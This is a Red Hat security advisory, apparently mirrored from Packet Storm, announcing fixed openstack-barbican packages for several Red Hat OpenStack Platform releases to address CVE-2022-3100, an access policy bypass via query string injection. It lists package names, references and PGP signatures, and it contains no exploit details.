FYqhqADiUcfpJGENligpNAHLI+Pijrl2Tfwl0XbDa8+7KXQ0T75VG3Gq7dFlPcUm  
965hFguLI0es2FpGcJldEqsc1XJxdkPmzTYhqDWLLED5X72dwQdtKwhMaFFVctK+  
KyspQqaci6bVr9ETF89r0ZBmnxXjSIY7/ijySy0KnldW25t+ZGmLV4pM3CYb7ZVz  
qEm9I/oRD0JB/4C5Bk9j5nWF3gzE2MhYfeepqINGIbfvNPiP8G2LFL/CEz46isF9  
rFUT/az/p5mdNEwwe5GhEgLkpk0fhcZiAtJ4bGRcJ9YRURh5rrMPtXmXP5THoMau  
3VmN11LnfT4=  
=pvMD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6753-01

Red Hat Security Advisory 2022-6750-01 - Barbican is a ReST API designed for the secure storage, provisioning and management of secrets, including in OpenStack environments. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (openstack-barbican) security update  
Advisory ID:       RHSA-2022:6750-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6750  
Issue date:        2022-09-29  
CVE Names:         CVE-2022-3100   
=====================================================================

1. Summary:

An update for openstack-barbican is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch  
Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server - noarch  
Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch  
Red Hat OpenStack Platform 17.0 - noarch

3. Description:

Barbican is a ReST API designed for the secure storage, provisioning and  
management of secrets, including in OpenStack environments.

Security Fix(es):

* openstack-barbican: access policy bypass via query string injection  
(CVE-2022-3100)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125404 - CVE-2022-3100 openstack-barbican: access policy bypass via query string injection

6. Package List:

Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server:

Source:  
openstack-barbican-6.0.1-6.el7ost.src.rpm

noarch:  
openstack-barbican-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-api-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-common-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-keystone-listener-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-worker-6.0.1-6.el7ost.noarch.rpm  
python-barbican-6.0.1-6.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
openstack-barbican-6.0.1-6.el7ost.src.rpm

noarch:  
openstack-barbican-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-api-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-common-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-keystone-listener-6.0.1-6.el7ost.noarch.rpm  
openstack-barbican-worker-6.0.1-6.el7ost.noarch.rpm  
python-barbican-6.0.1-6.el7ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
openstack-barbican-9.0.1-1.20220112203416.07be198.el8ost.src.rpm

noarch:  
openstack-barbican-9.0.1-1.20220112203416.07be198.el8ost.noarch.rpm  
openstack-barbican-api-9.0.1-1.20220112203416.07be198.el8ost.noarch.rpm  
openstack-barbican-common-9.0.1-1.20220112203416.07be198.el8ost.noarch.rpm  
openstack-barbican-keystone-listener-9.0.1-1.20220112203416.07be198.el8ost.noarch.rpm  
openstack-barbican-worker-9.0.1-1.20220112203416.07be198.el8ost.noarch.rpm  
python3-barbican-9.0.1-1.20220112203416.07be198.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-barbican-9.0.2-2.20220122185349.c718783.el8ost.src.rpm

noarch:  
openstack-barbican-9.0.2-2.20220122185349.c718783.el8ost.noarch.rpm  
openstack-barbican-api-9.0.2-2.20220122185349.c718783.el8ost.noarch.rpm  
openstack-barbican-common-9.0.2-2.20220122185349.c718783.el8ost.noarch.rpm  
openstack-barbican-keystone-listener-9.0.2-2.20220122185349.c718783.el8ost.noarch.rpm  
openstack-barbican-worker-9.0.2-2.20220122185349.c718783.el8ost.noarch.rpm  
python3-barbican-9.0.2-2.20220122185349.c718783.el8ost.noarch.rpm

Red Hat OpenStack Platform 17.0:

Source:  
openstack-barbican-12.0.1-0.20220614210405.486e607.el9ost.src.rpm

noarch:  
openstack-barbican-12.0.1-0.20220614210405.486e607.el9ost.noarch.rpm  
openstack-barbican-api-12.0.1-0.20220614210405.486e607.el9ost.noarch.rpm  
openstack-barbican-common-12.0.1-0.20220614210405.486e607.el9ost.noarch.rpm  
openstack-barbican-keystone-listener-12.0.1-0.20220614210405.486e607.el9ost.noarch.rpm  
openstack-barbican-worker-12.0.1-0.20220614210405.486e607.el9ost.noarch.rpm  
python3-barbican-12.0.1-0.20220614210405.486e607.el9ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3100  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzXonNzjgjWX9erEAQijjg/+OEM/R4tmChTm3BVnzZ/maaDNZTN1TbN7  
3Endp4Auwtw4vVGA2lo3NtX3z6vudutV98XY1pSLGvuLKPGJANkGrnUmcSi21uZy  
WoviSBiX5j75xOrYVL6WDzeJuZj5s1UwsFniwmVvyv/v8xl6/0szU/0h2RgefjNZ  
b4HJo7Dp1TN8J0rsEbRqylyj6uPCBuBiWSh8vYe7ss91//8FFPxpPJgbJFCCOobP  
aMVroBEEzt7GKmRRo0/i+lKdRq6fEe9F/dOaAXX6sUeXKIIUQUrGNgu1HnDPzLgr  
qW3vHShj0i6sfArWSOdMK+iXNiuIJYGaM0ru/IMyHHDoDCZBuEDSXohFiYqW5Aun  
77I+bshNxF3q71f+/o84huTlxUgzL+eavbFnMVJaLLPjLm81aHgB91QH9Navgz6t  
lXgflCk6jZhCsonDiTN2T0f/RbQLganawz8BXGzHyUSaVm+EEhMeU7UreiTl+3Do  
TBPB0YgZRaWTGcO7RRs5WAd9qn4NgPzTQF9mXNn92adzFZX5+j9eeafVhn/rhawT  
Tt7oCscqY8XyqhdlnoUaEgEGxTQmvKdUBLDeTwIcnXrfM4WOAist60aloU+J7CNX  
lCBuQBI2lg0kO4RgCfMgX+UC8xo2jU4Yr2TfnfE51dU+i96il36Nc+QO7AvDYfxJ  
3GKpgch0aNs=  
=quq1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm